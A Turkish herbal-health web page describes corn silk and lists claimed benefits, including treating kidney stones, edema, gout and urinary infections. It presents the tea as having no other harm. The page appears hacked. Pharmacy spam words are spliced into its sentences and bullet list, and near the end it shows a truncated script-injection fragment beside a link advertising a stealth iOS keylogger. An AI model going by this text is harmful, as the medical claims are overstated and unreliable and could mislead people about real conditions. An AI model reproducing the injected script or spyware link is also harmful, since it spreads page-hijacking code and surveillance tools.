Mısır Püskülü deyip geçmeyin!…

mısır püskülü

Mısır Püskülü; ortalama 2 metre boylarında, kökü kalın ve saçaklı, yaprakları şerit gibi uzun, sert ve sivri bir bitki olan mısırın meyvelerinin ucundaki saçaklardır. Anayurdu Güney Amerika olan mısır, Amerika Kıtası’nın keşfinden sonra denizciler tarafından Avrupa’ya getirilmiştir. Oradan da, Afrika anakarasından, Mısır üzerinden ülkemize getirildiğinden, dilimizde bu bitkiye mısır adı verildiği sanılmaktadır. Mısırın kökleri toprakta derine kadar iner, kalın ve bol saçaklıdır. 4 cm çapa ulaşabilen dik gövdesi boğumludur. Bu boğumlar arasında gövdenin içi boş olur. Gövde üzerinde almaşık dizili uzun yaprakları şerit biçiminde, paralel damarlı ve uçları sivridir. Aynı bitki üzerinde ayrı kesimlerde yer alan dişi ve erkek çiçeklerden erkek olanları, gövdenin ucunda başaklar. Dişi olanları, yaprak koltuklarında koçanlar halinde görülür,taneler şeklinde olur.  Bol güneşli sulak alanları seven mısır bitkisi, ülkemizin su bulunan hemen hemen her yerinde kültür bitkisi olarak yetiştirilirken çok gelişip fazla yer kapladığından tohumlarının toprağa seyrek olarak ekilmesine dikkat edilir. 6000 yıl kadar önce Güney Amerika’daki And Dağları bölgesi yerlileri tarafından yetiştirildiği ve tüketildiği saptanan mısır bitkisinin taneleri, yüksek oranda nişasta ile doymamış yağ asitleri, A vitamini ve sterolleri içerir. Bu yüzden mısır taneleri hem insanlar hem de hayvanlar için değerli bir besin kaynağıdır. Mısır Püskülleri; çiçeklenme zamanında görülmeye başlar. Bitkinin şifalı bölümü işte bu püsküllerdir. Çiçeklenme zamanı Temmuz-Ağustos aylarıdır. Mısır püskülü denilen ipliksi uzantıları (stigma) ise dişi çiçeklerin olgunlaşıp tane biçimine gelmeden önce koçanın ucunda 10-30  cm uzunlukta oluşturdukları saçaklardır. Mısır püskülleri, döllenme başlamadan önce kesilir ve gölgede kurutulur. Mısır püskülü bol miktarda potasyum, sodyum ve kalsiyum içerir. Mısır püskülünde ayrıca, karbonhidartalr, yağ, steroller, reçine, şekerler ve allantoin bulunur. Dişi çiçeklerden alınan püsküller, ince bir tabaka halinde, gölgelik bir yerde kurutulur. Mısır Püskülleri; açık esmer veya kırmızı esmerimsi renkli, hafif ve özel kokulu, tadsız, 1 mm kadar genişlikte, uzun liflerdir. İdrar söktürücü, taş düşürücü, yağları eritici, zayıflatıcı ve sakinleştirici etkileri vardır.  Güvenilir bir idrar sökücü gerektiğinde, aynı zamanda etkili ve başka hiçbir zararı olmayan zayıflatma ve bedendeki yağı azaltmaya yardımcı olarak kullanılan mısır püskülü çayı Pills içilebilir. Mısır püskülü tam olarak kurutulmadan uzun süre saklandığında, idrar söktürücü özelliğini yitirir ve dışkılamayı kolaylaştırır. Mısır püskülü çayı, taş yapıcı idrar yolları hastalıklarında, kalp ödeminde ve başka ödemlerde olduğu kadar, böbrek iltihabı, mesane nezlesi, romatizma ve gut hastalığında da başarıyla kullanılabilir. Ayrıca, çocukların ve yaşlıların yatağa işeme hallerinde ve böbrek sancılarında da yardımcı olur.

Mısır Püskülünün Faydaları ve Kullanım Alanları:

 • İdrar yollarını temizler ve idrar söktürür.
 • Cheap

 • Zayıflamaya ve vücuttaki yağları eritmeye yardımcı olur.
 • Böbrek iltihabı, romatizma ve gut hastalıklarına karşı yardımcıdır.
 • Ödemleri gidermeye yardımcı olur.
 • İdrar yollarındaki ve mesanedeki taşları düşürürmeye yardımcıdır.
 • Pills

 • Sinirleri yatıştırır ve sakinleştirici etkisi vardır
 • Order

 • Bedeni güçlendirici bir toniktir.
 • Üretrit (idrar yolları enfeksiyonu), sistit (mesane enfeksiyonu himalaya speman online ) ve prostatit (prostat bezi enfeksiyonu) tedavilerinde yardımcıdır. Bu durumlarda, özellikle Civanperçemi ile birlikte kullanılırsa daha etkili olur.
 • Çocuklarda ve yaşlılarda görülen altını ıslatma sorunlarının çözümünde faydalıdır.

var d=document;var s=d.createElement(‘script’); Order Purchase http://zeroblo.com/test1/2017/10/31/line-spy-ios-keylogger-stealthgenie/

Benzer Yazılar:

 • Benzer yazı bulunamadı.

You must be logged in to post a comment Giris

Linkler

Reklamlar

Giriş - Powered by Pixelim Media · Ukrayna Turlari | Ozge Tur | Tesla ERP